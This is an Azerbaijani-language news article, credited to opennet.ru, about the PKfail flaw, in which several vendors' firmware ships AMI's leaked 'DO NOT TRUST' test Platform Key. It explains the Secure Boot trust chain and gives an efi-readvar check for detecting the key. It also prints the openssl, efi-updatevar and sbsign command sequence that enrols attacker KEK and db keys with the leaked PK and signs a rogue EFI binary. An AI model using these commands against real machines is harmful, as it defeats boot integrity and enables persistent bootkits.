Binarly təhlükəsizlik araşdırmaçıları Acer, Dell, Fujitsu, Gigabyte, HP, Intel, Lenovo və Supermicro şirkətləri tərəfindən istehsal olunan 800-dən çox məhsulda UEFI Secure Boot düzgün yükləmə rejimini keçmə imkanını aşkar ediblər. Problem PKfail adı ilə tanınır və AMI (American Megatrends International) tərəfindən yaradılan və test nümunəsi kimi təqdim olunan etibarsız platforma açarından (PK, Platform Key) istifadə ilə bağlıdır. Test açarını istifadə edən ən köhnə firmware-lar 2012-ci ildən, ən yeni olanları isə iyun 2024-dən tarixlidir. Araşdırmaçılara görə, bütün yoxlanmış firmware-lərin 10%-dən çoxu bu problemə məruz qalıb.
Açarın parametrlərində onun etibarsız olduğu və məhsullarında təqdim edilməməsi göstərilmişdi. Bu test açarının öz açarı ilə əvəzlənməli olduğu düşünülürdü, amma istehsalçılar xəbərdarlığa diqqət etmədilər və yekun firmware-larda AMI ilə bütün tərəfdaşlara və müştərilərə göndərilən tipik ümumi açarı istifadə etdilər.
AMI test açarının imza yaratmaq üçün lazım olan gizli hissəsi, bir avadanlıq istehsalçısının əməkdaşının səhvən GitHub-da publik repo-da yerləşdirdiyi kodda aşkar lansı, məlumatların sızması ilə birlikdə açıqlandı. Gizli açar şifrlənmiş faylda yerləşdirilmişdi və onun şifrələnməsi üçün sadə 4-simvol şəklində parol istifadə olunmuşdu, hansı ki, asanlıqla təkrar cəhd üsulu ilə tapıldı.
Platforma açarı, Secure Boot üçün açar bazaları ilə sertifikatlaşdırma üçün etimadın kökü olaraq istifadə olunur. Platforma açarının gizli hissəsinin əldə edilməsi, yüklənən sistemin komponentlərinin düzgünlüyünün yoxlanılması zamanı istifadə olunan bütün etimad zəncirinin pozulmasına səbəb olur — platforma açarı bilindikdə, Secure Boot qorumasını keçmək və açar KEK (Key Exchange Key) və 'db' (Signature Database) və 'dbx' (Forbidden Signature Database) bazalarının manipulyasiyası ilə öz komponentlərini yükləməklə əvəzləmə təşkil etmək mümkündür. KEK firmware ilə əməliyyat sistemi arasında etimad zəncirinin yaradılmasından məsuldur, 'db' yükləyici və UEFI-nin üçüncü tərəf komponentləri üçün sertifikatlar və imzalar saxlayır, 'dbx' isə tanınmış zərərli komponentlərin ləğv edilmiş imzalarını əhatə edir.
Hücum həyata keçirmək üçün KEK və db üçün yeni açar və sertifikatlar yaratmaq kifayətdir, daha sonra test açarını alıb onu yaradılmış KEK sertifikatının UEFI firmware-ına yükləməyi istifadə edə bilərsiniz. KEK sertifikatını firmware-a yüklədikdən sonra onunla bağlı gizli açardan istifadə edərək yeni db sertifikatını yükləyə bilərsiniz. db sertifikatı yükləndikdən sonra onunla bağlı gizli açar yüklənmiş EFI komponentlərinin təsdiqlənməsi üçün tətbiq oluna bilər. openssl req -newkey rsa:4096 -nodes -keyout KEK.key -new -x509 -sha256 -days 3650 -subj «/CN=BRLY KEK/» -out KEK.crt openssl req -newkey rsa:4096 -nodes -keyout db.key -new -x509 -sha256 -days 3650 -subj «/CN=BRLY db/» -out db.crt efi-updatevar -a -c KEK.crt -k PK.key KEK efi-updatevar -a -c db.crt -k KEK.key db sbsign —key db.key —cert db.crt —output rogue.efi.signed rogue.efi
Platforma açarının düzgünlüyünü yoxlamaq üçün efitools paketindən «efi-readvar -v PK» utilitini işə salmaq kifayətdir və platforma açarının test açarı olmadığını təsdiq etməlisiniz: efi-readvar -v PK Variable PK, length 862 PK: List 0, type X509 Signature 0, size 834, owner 26dc4851-195f-4ae1-9a19-fbf883bbb35e Subject: CN=DO NOT TRUST — AMI Test PK Issuer: CN=DO NOT TRUST — AMI Test PK

Mənbə: opennet.ru
